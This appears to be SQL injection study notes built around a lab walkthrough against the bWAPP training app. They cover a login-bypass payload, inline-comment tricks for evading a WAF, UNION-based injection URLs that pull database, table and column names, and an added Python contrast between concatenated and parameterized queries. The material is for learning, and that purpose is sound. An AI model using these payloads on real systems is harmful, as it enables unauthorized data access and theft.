information_schema (from MySQL 5.0 onward, MySQL ships with a default information_schema database)
Three tables in information_schema:
SCHEMATA: the SCHEMA_NAME field stores the names of all databases created by users.
TABLES: the TABLE_SCHEMA and TABLE_NAME fields record the database names and table names of all databases created by users.
COLUMNS: the TABLE_SCHEMA, TABLE_NAME and COLUMN_NAME fields record the database names, table names and field names of all databases created by users.
Query statements
SELECT <field to query> FROM <database name>.<table name>
SELECT <field to query> FROM <database name>.<table name> WHERE <known field name> = '<known value>'
SELECT <field to query> FROM <database name>.<table name> WHERE <known field name> = '<known value>' AND <known field name 2> = '<known value 2>'
SELECT * FROM users
SELECT * FROM users limit 0,1
Important functions (used to query sensitive information during injection)
database(): the database the current site is using
version(): the current database version number
user(): the current database user
concat_ws(): displays multiple values together, joined with a separator
load_file(): reads a system file; the file path must be converted to hexadecimal
Comment symbols
# or -- followed by a space, or /**/
select username,password from <table name> where username = 'admin' and password = '123456'
admin' or 1=1#
select username,password from <table name> where username = 'admin' or 1=1#' and password = '123456'
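The login query above, as an added example that is not part of the original notes: the same query built by string concatenation next to a parameterized version. It assumes Python's sqlite3 as a stand-in for MySQL, a hypothetical users table with constructed data, and "-- " as the comment marker because SQLite has no "#" comment.

```python
import sqlite3

# Assumption: SQLite stands in for MySQL; the users table and its row are
# constructed sample data (plaintext password only to mirror the query above).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'correct-horse')")
    return db

def login_concat(db, username, password):
    # Vulnerable: input becomes part of the SQL text, so a quote closes the
    # string literal and a comment marker removes the password condition.
    sql = ("SELECT username, password FROM users WHERE username = '"
           + username + "' AND password = '" + password + "'")
    return db.execute(sql).fetchall()

def login_param(db, username, password):
    # Hardened: placeholders send input as bound values, never as SQL syntax.
    sql = "SELECT username, password FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchall()

# The input from the notes above, with "-- " in place of "#".
CRAFTED = "admin' or 1=1-- "

if __name__ == "__main__":
    db = make_db()
    print("concatenated: ", login_concat(db, CRAFTED, "123456"))
    print("parameterized:", login_param(db, CRAFTED, "123456"))
    print("valid login:  ", login_param(db, "admin", "correct-horse"))
```

With the parameterized query the crafted username is compared as a literal string, so it matches no row and the password condition still applies.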
Inline comments (used to get past a WAF and other protections)
/*!code*/
/*!union*/ /*!select*/ 1,2,3
UNION query injection
http://192.168.100.130/sqli_2.php?movie=4%E2%80%98&action=go
http://192.168.100.130/sqli_2.php?movie=4%20and%201=1&action=go
http://192.168.100.130/sqli_2.php?movie=4%20and%201=2&action=go
http://192.168.100.130/sqli_2.php?movie=4%20order%20by%207--+&action=go (confirms the number of columns in the table)
http://192.168.100.130/sqli_2.php?movie=-4%20union%20select%201,2,3,4,5,6,7%20--+&action=go
http://192.168.100.130/sqli_2.php?movie=-4%20union%20select%201,database(),version(),4,user(),6,7%20--+&action=go
Current database name: bWAPP
Current database version: 5.5.47
Current database user name: localhost
http://192.168.100.130/sqli_2.php?movie=-4 union select 1,table_name,3,4,5,6,7 from information_schema.tables limit 3,1-- &action=go
http://192.168.100.130/sqli_2.php?movie=-4%20union%20select%201,column_name,3,4,5,6,7%20from%20information_schema.columns%20where%20column_name=0x75736572%20limit%200,1--%20&action=go
http://192.168.100.130/sqli_2.php?movie=-4%20union%20select%201,column_name,3,4,5,6,7%20from%20information_schema.columns%20where%20column_name=0x70617373776f7264%20limit%200,1--%20&action=go